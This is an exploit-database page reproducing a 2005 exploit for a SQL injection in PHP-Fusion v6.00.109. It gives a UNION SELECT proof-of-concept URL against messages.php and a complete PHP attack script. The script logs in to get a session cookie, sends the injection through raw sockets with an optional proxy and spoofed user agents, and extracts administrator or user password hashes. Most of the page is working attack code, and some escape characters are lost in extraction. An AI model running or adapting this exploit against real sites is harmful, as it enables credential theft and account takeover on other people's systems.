PHP-Fusion v6.00.109 SQL Injection / admin|users credentials disclosure
CVE
Category
Price
Severity
N/A
CWE-89
N/A
High
Author
Risk
Exploitation Type
Date
N/A
High
Remote
2005-10-06
CPE PURL
cpe:cpe:/a:php-fusion:php-fusion:6.00.109
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2005090026 Below is a copy: PHP-Fusion v6.00.109 SQL Injection / admin|users credentials disclosure
site: http://www.php-fusion.co.uk
- if magic_quotes off -> SQL Injection, poc:
http://[target]/[path_to_Php_Fusion]/messages.php?msg_send=' UNION SELECT user_password FROM fusion_users WHERE user_name='[admin_username]'/*
now hash is showed in "To:" field when you post a private message
this is the tool:
<?php
# 19.17 28/09/2005 #
# #
# -- PhpF6_00_109xpl.php #
# #
# PHP-Fusion v6.00.109 SQL Injection / admin|users credentials disclosure #
# #
# by rgod #
# site: http://rgod.altervista.org #
# #
# mphhh, private messages again...tze,tze #
# #
# make these changes in php.ini if you have troubles #
# to launch this script: #
# allow_call_time_pass_reference = on #
# register_globals = on #
# #
# usage: launch this script from Apache, fill requested fields, then #
# go! #
# #
# Sun-Tzu: "Therefore the clever combatant imposes his will on the enemy, #
# but does not allow the enemy's will to be imposed on him" #
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo'<head><title> *** PHP-Fusion v6.00.109 SQL Injection *** </title> <meta
http-equiv= "Content-Type" content="text/html; charset=iso-8859-1"> <style
type="text/css"><!-- body,td,th {color:#00FF00;} body{background-color: #000000;}
.Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; }
.Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold;
font-style: italic; } --> </style></head><body> <p class="Stile6"> Php-Fusion v6.
00.109 SQL Injection / admin|user credentials disclosure </p><p class="Stile6">
a script by rgod at <a href="http://rgod.altervista.org" target="_blank">
http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%"> <form
name="form1" method="post" action="'.$SERVER[PHP_SELF].'?path=value&host=value
&port=value&proxy=value&user=value&pass=value&username=value"> <p> <input
type="text" name="host"><span class="Stile5"> hostname ( ex: www.sitename.com )
</span></p> <p> <input type="text" name="path"><span class="Stile5"> path (ex:
/phpfusion/ or just /)</span></p><p> <input type="text" name="port"> <span
class="Stile5">specify a port other than 80 (default value)</span></p><p> <input
type="text" name="user"> <span class="Stile5">your username </span> </p> <p>
<input type="text" name="pass"> <span class="Stile5">your password ( to get a
valid session cookie) </span></p><p><input type="text" name="username"> <span
class="Stile5">user whom you want the password </span></p><p><input type="text"
name="proxy"> <span class="Stile5"> send exploit trough an HTTP proxy </span>
</p> <p> <input type="submit"name="Submit" value="go!"> </p></form> </td> </tr>
</table></body></html>';
function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td> </td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td> </td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}
$proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)';
function sendpacket()
{
global $proxy, $host, $port, $html, $packet;
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);}
else
{
if (!eregi($proxy_regex,$proxy))
{echo htmlentities($proxy).' -> not a valid proxy...';
die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
fputs($ock,$packet);
if ($proxy=='')
{
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
}
else
{
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html.=fread($ock,2048);
}
}
fclose($ock);
echo nl2br(htmlentities($html));
}
if (($path<>'') and ($host<>'') and ($user<>'') and ($pass<>'') and ($username<>''))
{
if ($port=='') {$port=80;}
#STEP 1 -> login, to retrieve a session cookie...
$data="user_name=".urlencode(trim($user))."&user_pass=".urlencode(trim($
pass))."&login=Login";
if ($proxy=='')
{$packet="POST ".$path."news.php HTTP/1.1rn";}
else
{$packet="POST http://".$host.$path."news.php HTTP/1.1rn";}
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*rn";
$packet.="Referer: http://".$host.$path."/news.phprn";
$packet.="Accept-Language: enrn";
$packet.="Content-Type: application/x-www-form-urlencodedrn";
$packet.="Accept-Encoding: gzip, deflatern";
$packet.="User-Agent: Googlebot/2.1rn";
$packet.="Host: ".$host."rn";
$packet.="Content-Length: ".strlen($data)."rn";
$packet.="Connection: Keep-Alivern";
$packet.="Cache-Control: no-cachern";
$packet.="Cookie: fusion_visited=yes; PHPSESSID=44ab49664b56b97036425427b1ffb8cfrnrn";
$packet.=$data;
show($packet);
sendpacket($packet);
$temp=explode("Set-Cookie: ",$html);
$temp2=explode(' ',$temp[1]);
$cookie=$temp2[0];
echo '<br>Your cookie: '.htmlentities($cookie);
# STEP 2 -> SQL Injection, now retrieve the MD5 password hash from database
$username=str_replace("'","",$username);
$sql="' UNION SELECT user_password FROM fusion_users WHERE user_name='".trim($username)."'/*";
if ($proxy=='')
{$packet="GET ".$path."messages.php?msg_send=".urlencode($sql)." HTTP/1.1rn";}
else
{$packet="GET http://".$host.$path."messages.php?msg_send=".urlencode($sql)." HTTP/1.1rn";}
$packet.="User-Agent: GameBoy, Powered by Nintendorn";
$packet.="Host: ".$host."rn";
$packet.="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1rn";
$packet.="Accept-Language: enrn";
$packet.="Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1rn";
$packet.="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0rn";
$packet.="Cookie: ".$cookie."rn";
$packet.="Cookie2: $Version=1rn";
$packet.="Connection: Keep-Alive, TErn";
$packet.="TE: deflate, gzip, chunked, identity, trailersrnrn";
show($packet);
sendpacket($packet);
if (eregi('For Members only',$html)) {echo 'You have to specify a valid session cookie...'; die; }
$temp=explode("'Click to view the senders profile'>",$html);
$temp2=explode("</a>",$temp[1]);
$hash=$temp2[0];
echo '<br>Username: '.htmlentities($username).' Password hash: '.$hash;
}
else
{ echo '<br> Fill requested fields, optionally specify a proxy...';}
?>
rgod
site: http://rgod.altervista.org
mail: retrogod (at) aliceposta (dot) it [email concealed]
original advisory:
http://rgod.altervista.org/phpfusion600109.html
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum